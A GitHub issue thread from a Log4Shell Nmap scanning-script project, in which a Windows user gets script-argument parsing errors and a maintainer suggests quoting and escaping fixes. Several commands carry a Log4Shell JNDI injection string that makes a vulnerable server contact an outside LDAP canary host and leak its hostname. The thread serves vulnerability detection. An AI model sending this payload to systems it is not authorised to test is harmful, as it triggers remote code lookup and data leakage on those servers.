Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Failed to initialize script engine - Arguments did not parse #9

Open
maxdemajo opened this issue Dec 16, 2021 · 4 comments
Open

Failed to initialize script engine - Arguments did not parse #9

maxdemajo opened this issue Dec 16, 2021 · 4 comments

Comments

@maxdemajo
Copy link

Running Nmap on Windows:
.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}"' -T4 -n -p80 --script-timeout=1m 10.0.0.1

I get the following error:

Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-16 16:23 W. Europe Standard Time
NSE: args = log4shell.payload=${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}
NSE: failed to initialize the script engine:
C:\Users\User\Downloads\nmap-7.92-win32/nse_main.lua:1276: arguments did not parse!
stack traceback:
        [C]: in function 'error'
        C:\Users\User\Downloads\nmap-7.92-win32/nse_main.lua:1276: in main chunk
        [C]: in ?

QUITTING!

Scripts are in the same directory as nmap. Any ideas?
@kost
Copy link

kost commented Dec 16, 2021
edited

Hello!

Thanks for reporting. Since it is windows. You should use following escaping:
.\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell,smtp-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}\"" -T4 -n -p80 --script-timeout=1m 10.0.0.1

According to:
https://nmap.org/book/nse-usage.html#nse-args

Let me know if it works for you!

@kost-div
Copy link
Contributor

Managed to work for you?

@maxdemajo
Copy link
Author

maxdemajo commented Dec 17, 2021
edited

Hello!

Thanks for reporting. Since it is windows. You should use following escaping: .\nmap.exe --script=http-log4shell,ssh-log4shell,imap-log4shell,smtp-log4shell "--script-args=log4shell.payload=\"${jndi:ldap://x${hostName}.L4J.xxxx.canarytokens.com/a}\"" -T4 -n -p80 --script-timeout=1m 10.0.0.1

According to: https://nmap.org/book/nse-usage.html#nse-args

Let me know if it works for you!

Thanks for your response :)

Nmap complains if you don't add ticks (`) before the curly brackets, so I added them and was able to begin the scan. I am getting a new error but haven't looked into it properly yet:
Unable to split netmask from target expression: "${jndi:ldap://x${hostName}.L4J.XXXXXXXXXXXX.canarytokens.com/a}\"

@kost-div
Copy link
Contributor

Usually that means escaping was not good. Add -d to the command line, so you can check how it interpreted those script-args, so you got that error message.

Have you tried with the basic scan?

cd nse-log4shell
nmap.exe -sV -T4 -v --script=%cd%/ scanme.nmap.org

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@kost @maxdemajo @kost-div